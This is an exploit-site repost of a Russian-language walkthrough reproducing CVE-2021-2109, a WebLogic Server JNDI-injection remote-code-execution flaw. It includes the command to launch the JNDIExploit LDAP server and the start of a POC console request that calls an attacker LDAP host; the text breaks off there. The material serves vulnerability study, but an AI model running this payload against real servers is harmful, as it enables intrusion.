Sploitus

Exploit for CVE-2021-2109 CVE-2020-14750 CVE-2021-2109

kitploit · 2026-08-25

Exploit Code

MARKDOWN24 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-RABBITSAFE-CVE-2021-2109
# CVE-2021-2109 Weblogic Server: воспроизведение и анализ уязвимости удалённого выполнения кода

В январе 2021 года Oracle выпустила обновление безопасности, включающее 329 новых патчей безопасности для продуктов Oracle. В этом уведомлении особо упоминалось уведомление о безопасности Oracle WebLogic Server от 1 ноября 2020 года, касающееся уязвимости CVE-2020-14750. Клиентам настоятельно рекомендуется применить этот патч, а также другие патчи из этого уведомления. CVE-2021-2109 — это уязвимость удалённого выполнения кода в Weblogic. Уязвимость в основном обусловлена JNDI-инъекцией, что позволяет злоумышленнику удалённо выполнять код.

Затронуты следующие версии: Weblogic Server 10.3.6.0.0 Weblogic Server 12.1.3.0.0 Weblogic Server 12.2.1.3.0 Weblogic Server 12.2.1.4.0 Weblogic Server 14.1.1.0.0

  1. Воспроизведение уязвимости удалённого выполнения кода CVE-2021-2109 Weblogic Server



Тестовая среда Weblogic Server разворачивается с помощью DOCKER; Weblogic Server доступен. ![image](https://raw.githubusercontent.com/rabbitsafe/CVE-2021-2109/main/1.png)

  1. JNDI-инъекция при штатном входе в консоль управления В первом случае необходимо войти в консоль управления Weblogic Server с учётной записью администратора, перехватить пакет данных входа с помощью BurpSuite и получить данные Cookie для входа.



![image](https://raw.githubusercontent.com/rabbitsafe/CVE-2021-2109/main/2.png)

Запустите LDAP на локальной машине; его можно загрузить по адресу https://github.com/feihong-cs/JNDIExploit/releases/tag/v.1.11. Команда: java -jar JNDIExploit-v1.11.jar -i 192.168.131.1

![image](https://raw.githubusercontent.com/rabbitsafe/CVE-2021-2109/main/3.png)

Отправьте POC-пакет JNDI-инъекции для уязвимости удалённого выполнения кода CVE-2021-2109 Weblogic Server: POST /console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.131;1:1389/Basic/WeblogicEcho;AdminServer%22) HTTP/1.1